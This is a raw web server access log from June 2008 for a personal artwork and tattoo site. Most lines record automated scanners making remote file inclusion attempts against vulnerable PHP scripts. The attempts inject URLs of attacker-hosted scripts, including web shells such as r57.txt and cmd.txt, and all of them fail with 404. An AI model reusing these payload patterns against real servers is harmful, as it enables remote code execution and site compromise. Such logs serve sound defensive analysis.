62.140.19.142 - - [08/Jun/2008:17:23:10 -0500] "GET /logs//editor2/spaw_control.class.php?spaw_root=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:17:23:11 -0500] "GET //editor2/spaw_control.class.php?spaw_root=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.76"
201.25.155.27 - - [08/Jun/2008:17:23:28 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
213.194.149.215 - - [08/Jun/2008:17:24:55 -0500] "GET //Full_Release/include/body_comm.inc.php?content=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.812"
213.194.149.215 - - [08/Jun/2008:17:24:56 -0500] "GET /logs//Full_Release/include/body_comm.inc.php?content=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
67.19.120.178 - - [08/Jun/2008:17:27:38 -0500] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.812"
67.19.120.178 - - [08/Jun/2008:17:27:39 -0500] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.812"
74.6.22.166 - - [08/Jun/2008:17:29:13 -0500] "GET /logs/access_log.1208304000 HTTP/1.0" 200 212686 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.140.19.142 - - [08/Jun/2008:17:29:40 -0500] "GET /logs/access_log.1203638400//faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:17:29:40 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:17:29:40 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:17:29:48 -0500] "GET /logs/access_log.1203638400//faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:17:29:49 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:17:29:49 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
62.65.159.210 - - [08/Jun/2008:17:32:02 -0500] "GET /logs/access_log.1181952000//config.php?path[docroot]=http://rjoos.ch:/Reise/images/tOtti/r8? HTTP/1.1" 404 322 "-""libwww-perl/5.76"
62.65.159.210 - - [08/Jun/2008:17:32:06 -0500] "GET /logs/access_log.1208649600//config.php?path[docroot]=http://rjoos.ch:/Reise/images/tOtti/r8? HTTP/1.1" 404 322 "-""libwww-perl/5.76"
193.205.194.23 - - [08/Jun/2008:17:32:56 -0500] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
193.205.194.23 - - [08/Jun/2008:17:32:56 -0500] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.136.58.116 - - [08/Jun/2008:17:33:08 -0500] "GET /logs/access_log.1208649600/config.php?path[docroot]=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.136.58.116 - - [08/Jun/2008:17:33:09 -0500] "GET /config.php?path[docroot]=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.136.58.116 - - [08/Jun/2008:17:33:09 -0500] "GET /logs/config.php?path[docroot]=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
168.158.128.26 - - [08/Jun/2008:17:33:20 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
168.158.128.26 - - [08/Jun/2008:17:33:22 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
64.136.58.116 - - [08/Jun/2008:17:33:27 -0500] "GET /logs/access_log.1181952000/config.php?path[docroot]=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:17:34:13 -0500] "GET /logs/access_log.1203638400//faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:17:34:14 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:17:34:14 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
216.127.70.91 - - [08/Jun/2008:17:34:44 -0500] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.127.70.91 - - [08/Jun/2008:17:34:44 -0500] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
89.188.112.121 - - [08/Jun/2008:17:37:55 -0500] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.188.112.121 - - [08/Jun/2008:17:37:55 -0500] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:17:39:01 -0500] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:17:39:01 -0500] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
24.57.170.17 - - [08/Jun/2008:17:41:24 -0500] "GET /artwork/toys.htm HTTP/1.1" 200 1337 "http://search.msn.com/images/results.aspx?q=ark+TOYS&go=&form=QBIR""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Creative ZENcast v1.02.10)"
24.57.170.17 - - [08/Jun/2008:17:41:24 -0500] "GET /artwork/blocks2.png HTTP/1.1" 200 26605 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Creative ZENcast v1.02.10)"
24.57.170.17 - - [08/Jun/2008:17:41:24 -0500] "GET /artwork/blocks1.png HTTP/1.1" 200 30135 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Creative ZENcast v1.02.10)"
24.57.170.17 - - [08/Jun/2008:17:41:25 -0500] "GET /artwork/ark2.gif HTTP/1.1" 200 81971 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Creative ZENcast v1.02.10)"
24.57.170.17 - - [08/Jun/2008:17:41:25 -0500] "GET /artwork/arkanimals1.gif HTTP/1.1" 200 76485 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Creative ZENcast v1.02.10)"
24.57.170.17 - - [08/Jun/2008:17:41:26 -0500] "GET /artwork/mixnmatchanimals2.gif HTTP/1.1" 200 63914 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Creative ZENcast v1.02.10)"
24.57.170.17 - - [08/Jun/2008:17:41:26 -0500] "GET /artwork/rocking-mc.jpg HTTP/1.1" 200 66440 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Creative ZENcast v1.02.10)"
24.57.170.17 - - [08/Jun/2008:17:41:26 -0500] "GET /artwork/family.jpg HTTP/1.1" 200 15546 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Creative ZENcast v1.02.10)"
24.57.170.17 - - [08/Jun/2008:17:41:26 -0500] "GET /artwork/block-set2.jpg HTTP/1.1" 200 67585 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Creative ZENcast v1.02.10)"
62.140.19.142 - - [08/Jun/2008:17:42:06 -0500] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:17:42:07 -0500] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:17:43:15 -0500] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:17:43:15 -0500] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.76"
89.188.112.121 - - [08/Jun/2008:17:44:25 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.188.112.121 - - [08/Jun/2008:17:44:25 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
195.56.189.33 - - [08/Jun/2008:17:45:37 -0500] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.56.189.33 - - [08/Jun/2008:17:45:38 -0500] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.202.117.159 - - [08/Jun/2008:17:46:14 -0500] "GET /logs/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
64.202.117.159 - - [08/Jun/2008:17:46:14 -0500] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
213.194.149.215 - - [08/Jun/2008:17:46:17 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.812"
213.194.149.215 - - [08/Jun/2008:17:46:17 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.812"
195.56.189.33 - - [08/Jun/2008:17:46:31 -0500] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.56.189.33 - - [08/Jun/2008:17:46:31 -0500] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.200.201.194 - - [08/Jun/2008:17:46:48 -0500] "GET /logs/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
74.200.201.194 - - [08/Jun/2008:17:46:48 -0500] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
216.127.70.91 - - [08/Jun/2008:17:51:00 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
216.127.70.91 - - [08/Jun/2008:17:51:01 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
85.126.14.2 - - [08/Jun/2008:17:53:17 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
85.126.14.2 - - [08/Jun/2008:17:53:18 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
81.52.143.16 - - [08/Jun/2008:17:54:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.16 - - [08/Jun/2008:17:55:04 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
65.55.208.134 - - [08/Jun/2008:17:55:30 -0500] "GET /logs/access_log.1206662400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
89.218.85.18 - - [08/Jun/2008:17:55:53 -0500] "GET /logs/access_log.1208649600//faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:17:55:55 -0500] "GET /logs/access_log.1204156800//faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
209.51.219.170 - - [08/Jun/2008:17:56:28 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.65"
209.51.219.170 - - [08/Jun/2008:17:56:29 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
74.222.17.2 - - [08/Jun/2008:17:56:36 -0500] "GET /logs/access_log.1208649600/index1.php?x=http://holaas.net78.net/cmd.txt????????????????? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
74.222.17.2 - - [08/Jun/2008:17:56:37 -0500] "GET /index1.php?x=http://holaas.net78.net/cmd.txt????????????????? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
74.222.17.2 - - [08/Jun/2008:17:56:37 -0500] "GET /logs/index1.php?x=http://holaas.net78.net/cmd.txt????????????????? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
62.149.175.25 - - [08/Jun/2008:17:56:45 -0500] "GET /logs//include.php?path[docroot]=http://www.indicce.com/admin/r57.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
87.22.37.144 - - [08/Jun/2008:17:57:58 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
87.22.37.144 - - [08/Jun/2008:17:57:58 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
67.205.96.205 - - [08/Jun/2008:17:58:46 -0500] "GET /logs//spaw_control.class.php?spaw_root=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
67.205.96.205 - - [08/Jun/2008:17:58:46 -0500] "GET //spaw_control.class.php?spaw_root=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
64.202.117.159 - - [08/Jun/2008:18:02:03 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.811"
64.202.117.159 - - [08/Jun/2008:18:02:03 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.811"
62.65.159.210 - - [08/Jun/2008:18:04:55 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://rjoos.ch:/Reise/images/tOtti/r8? HTTP/1.1" 404 346 "-""libwww-perl/5.76"
62.65.159.210 - - [08/Jun/2008:18:04:55 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://rjoos.ch:/Reise/images/tOtti/r8? HTTP/1.1" 404 341 "-""libwww-perl/5.76"
213.193.215.56 - - [08/Jun/2008:18:05:39 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://alieandrann.net/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
213.193.215.56 - - [08/Jun/2008:18:05:39 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://alieandrann.net/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
87.230.21.211 - - [08/Jun/2008:18:05:58 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
87.230.21.211 - - [08/Jun/2008:18:05:59 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
62.65.159.210 - - [08/Jun/2008:18:08:10 -0500] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://rjoos.ch:/Reise/images/tOtti/r8? HTTP/1.1" 404 331 "-""libwww-perl/5.76"
62.65.159.210 - - [08/Jun/2008:18:08:10 -0500] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://rjoos.ch:/Reise/images/tOtti/r8? HTTP/1.1" 404 326 "-""libwww-perl/5.76"
71.58.247.228 - - [08/Jun/2008:18:08:25 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:08:26 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:08:26 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:08:29 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
201.25.155.27 - - [08/Jun/2008:18:08:29 -0500] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
201.25.155.27 - - [08/Jun/2008:18:08:30 -0500] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.65"
71.58.247.228 - - [08/Jun/2008:18:08:41 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:08:41 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:08:41 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:08:41 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:08:41 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:08:41 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:08:41 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:08:41 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:08:41 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:08:41 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:08:41 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:09:02 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:09:02 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:09:02 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:09:02 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:09:02 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:09:02 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:09:02 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:09:02 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:09:02 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.58.247.228 - - [08/Jun/2008:18:09:02 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
